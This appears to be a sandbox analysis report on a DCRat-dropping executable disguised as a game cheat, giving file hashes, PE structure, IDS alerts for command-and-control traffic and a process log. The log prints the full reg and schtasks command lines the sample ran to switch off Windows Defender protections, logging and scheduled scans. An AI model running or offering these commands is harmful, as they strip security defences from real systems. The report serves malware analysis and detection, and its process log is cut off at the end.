                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):39
                                      Entropy (8bit):4.28126736094609
                                      Encrypted:false
                                      SSDEEP:3:wWATpKKhOin:yTpki
                                      MD5:19FE83FEEC263D4E4E68E3DD0E6B3615
                                      SHA1:7FF948A654D54ACFDE0E798FE1D67160343F8DFD
                                      SHA-256:07DC5ED69F4847071B41D0086EF8A11032C2D85B1EC8A8B00A5D29480C3E6744
                                      SHA-512:EE6FEF4211B60DFF50B7CDB88F9EC0028A67BC428AB854C0932DB7E5873F9A22E16760D59FF6B885FDB96ED7F6582D3735F629D6E825DCFD1E8C13C5D5ADAE78
                                      Malicious:false
                                      Preview:"%SystemDrive%\blockweb\portrefNet.exe"
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):34
                                      Entropy (8bit):4.124083797069061
                                      Encrypted:false
                                      SSDEEP:3:LlzRWDNMSdn:PWbn
                                      MD5:677CC4360477C72CB0CE00406A949C61
                                      SHA1:B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
                                      SHA-256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
                                      SHA-512:7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
                                      Malicious:false
                                      Preview:MsgBox "TestDefault, Message!", 64
                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.99074200508439
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:FixTsDfhiC.exe
                                      File size:13'317'632 bytes
                                      MD5:bbd6ffdb33259778f08704696a04891f
                                      SHA1:0fd836bb4bfc035ff35ebe0fb47e4693cec9e8ba
                                      SHA256:841eb644979b3c640761762645c9cd26f9bb46e558eaeb7bf0c2a79e761878f4
                                      SHA512:1b66f11b3a3dea1e6a8f4f7ee493437a41e30704d1c80048efd245184a447fde6abf06fe45af0663a72b30b657a7297554df8c3af7b36ae2e0df21a5031a34e0
                                      SSDEEP:393216:2JlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8X:2bQpgssCKInwjJaMc
                                      TLSH:8DD633B760651386C0E5C63ACA37BED330F68F6F8A80A47955D9B9C12F36884D657B03
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0x4020cc
                                      Entrypoint Section:CODE
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      DLL Characteristics:
                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:d59a4a699610169663a929d37c90be43
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      mov ecx, 0000000Ch
                                      push 00000000h
                                      push 00000000h
                                      dec ecx
                                      jne 00007F5F2515ED5Bh
                                      push ecx
                                      push ebx
                                      push esi
                                      push edi
                                      mov eax, 0040209Ch
                                      call 00007F5F2515E7D0h
                                      xor eax, eax
                                      push ebp
                                      push 00402361h
                                      push dword ptr fs:[eax]
                                      mov dword ptr fs:[eax], esp
                                      lea edx, dword ptr [ebp-14h]
                                      mov eax, 00402378h
                                      call 00007F5F2515EBA9h
                                      mov eax, dword ptr [ebp-14h]
                                      call 00007F5F2515EC79h
                                      mov edi, eax
                                      test edi, edi
                                      jng 00007F5F2515EF96h
                                      mov ebx, 00000001h
                                      lea edx, dword ptr [ebp-20h]
                                      mov eax, ebx
                                      call 00007F5F2515EC38h
                                      mov ecx, dword ptr [ebp-20h]
                                      lea eax, dword ptr [ebp-1Ch]
                                      mov edx, 00402384h
                                      call 00007F5F2515E3C8h
                                      mov eax, dword ptr [ebp-1Ch]
                                      lea edx, dword ptr [ebp-18h]
                                      call 00007F5F2515EB6Dh
                                      mov edx, dword ptr [ebp-18h]
                                      mov eax, 00404680h
                                      call 00007F5F2515E2A0h
                                      lea edx, dword ptr [ebp-2Ch]
                                      mov eax, ebx
                                      call 00007F5F2515EC06h
                                      mov ecx, dword ptr [ebp-2Ch]
                                      lea eax, dword ptr [ebp-28h]
                                      mov edx, 00402390h
                                      call 00007F5F2515E396h
                                      mov eax, dword ptr [ebp-28h]
                                      lea edx, dword ptr [ebp-24h]
                                      call 00007F5F2515EB3Bh
                                      mov edx, dword ptr [ebp-24h]
                                      mov eax, 00404684h
                                      call 00007F5F2515E26Eh
                                      lea edx, dword ptr [ebp-38h]
                                      mov eax, ebx
                                      call 00007F5F2515EBD4h
                                      mov ecx, dword ptr [ebp-38h]
                                      lea eax, dword ptr [ebp-34h]
                                      mov edx, 0040239Ch
                                       Name | Virtual Address | Virtual Size | Is in Section
                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5000 | 0x302 | .idata
                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9000 | 0xcb1358 | .rsrc
                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0x1c8 | .reloc
                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x7000 | 0x18 | .rdata
                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                       CODE | 0x1000 | 0x13b8 | 0x1400 | e5913936857bed3b3b2fbac53e973471 | False | 0.6318359375 | data | 6.340990548290613 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                       DATA | 0x3000 | 0x7c | 0x200 | cef89de607e490725490a3cd679af6bb | False | 0.162109375 | Matlab v4 mat-file (little endian), numeric, rows 0, columns 4230400 | 1.1176271682252383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       BSS | 0x4000 | 0x695 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .idata | 0x5000 | 0x302 | 0x400 | 3d2f2fc4e279cba623217ec9de264c4f | False | 0.3876953125 | data | 3.47731642923935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .tls | 0x6000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .rdata | 0x7000 | 0x18 | 0x200 | 467f29e48f3451df774e13adae5aafc2 | False | 0.05078125 | data | 0.1991075177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                       .reloc | 0x8000 | 0x1c8 | 0x200 | 9859d413c7408cb699cca05d648c2502 | False | 0.876953125 | data | 5.7832974211095225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                       .rsrc | 0x9000 | 0xcb1358 | 0xcb1400 | 99aaaea1dc4a108b8e9b7129eb591074 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_RCDATA | 0x9294 | 0xcb0400 | PE32 executable (GUI) Intel 80386, for MS Windows | | | 0.9460124969482422
RT_RCDATA | 0xcb9694 | 0xc3f | ASCII text | | | 0.19138755980861244
RT_RCDATA | 0xcba2d4 | 0x13 | ASCII text, with no line terminators | | | 1.4210526315789473
RT_RCDATA | 0xcba2e8 | 0x14 | ASCII text, with no line terminators | | | 1.4
RT_RCDATA | 0xcba2fc | 0x1 | very short file (no magic) | | | 9.0
RT_RCDATA | 0xcba300 | 0x1 | very short file (no magic) | | | 9.0
RT_RCDATA | 0xcba304 | 0x1 | very short file (no magic) | | | 9.0
RT_RCDATA | 0xcba308 | 0x1 | very short file (no magic) | | | 9.0
RT_RCDATA | 0xcba30c | 0x10 | data | | | 1.5
RT_RCDATA | 0xcba31c | 0x1 | very short file (no magic) | | | 9.0
RT_RCDATA | 0xcba320 | 0x38 | data | | | 1.0714285714285714
DLL | Import
kernel32.dll | GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
kernel32.dll | WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
shfolder.dll | SHGetFolderPathA
shell32.dll | ShellExecuteA
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T08:43:02.046365+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.4 | 49745 | 92.53.106.114 | 80 | TCP
2024-10-30T08:43:13.265199+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.4 | 49803 | 92.53.106.114 | 80 | TCP
2024-10-30T08:43:27.937516+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.4 | 49890 | 92.53.106.114 | 80 | TCP
2024-10-30T08:43:51.421636+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.4 | 50013 | 92.53.106.114 | 80 | TCP
2024-10-30T08:43:59.906040+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.4 | 50016 | 92.53.106.114 | 80 | TCP
2024-10-30T08:44:07.859223+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.4 | 50019 | 92.53.106.114 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 08:42:19.291796923 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Oct 30, 2024 08:42:19.299493074 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Oct 30, 2024 08:42:19.299587965 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Oct 30, 2024 08:42:19.299786091 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Oct 30, 2024 08:42:19.305185080 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Oct 30, 2024 08:42:19.891028881 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Oct 30, 2024 08:42:19.902496099 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 08:42:19.280219078 CET | 61995 | 53 | 192.168.2.4 | 1.1.1.1
Oct 30, 2024 08:42:19.290858984 CET | 53 | 61995 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 08:42:19.280219078 CET | 192.168.2.4 | 1.1.1.1 | 0xc5bf | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 08:42:19.290858984 CET | 1.1.1.1 | 192.168.2.4 | 0xc5bf | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 208.95.112.1 | 80 | 8100 | C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:42:19.299786091 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Oct 30, 2024 08:42:19.891028881 CET | 174 | IN | HTTP/1.1 200 OK
    Date: Wed, 30 Oct 2024 07:42:19 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 74 72 75 65 0a
    Data Ascii: true


Target ID: 0
Start time: 03:42:02
Start date: 30/10/2024
Path: C:\Users\user\Desktop\FixTsDfhiC.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\FixTsDfhiC.exe"
Imagebase: 0x400000
File size: 13'317'632 bytes
MD5 hash: BBD6FFDB33259778F08704696A04891F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 03:42:03
Start date: 30/10/2024
Path: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
Imagebase: 0x400000
File size: 13'304'832 bytes
MD5 hash: 7DB5128F7A81CC1AF094D8898E79FF21
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 75%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 2
Start time: 03:42:05
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 03:42:05
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 03:42:05
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 03:42:06
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 03:42:06
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 03:42:06
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 03:42:06
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 03:42:06
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 03:42:06
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 03:42:06
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 03:42:07
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 03:42:07
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 03:42:07
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 03:42:07
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 03:42:07
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 03:42:07
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 03:42:07
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 03:42:08
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Imagebase: 0x150000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 03:42:08
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
Imagebase: 0x150000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 03:42:08
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
Imagebase: 0x150000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 03:42:08
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
Imagebase: 0x150000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 03:42:08
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
Imagebase: 0x150000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
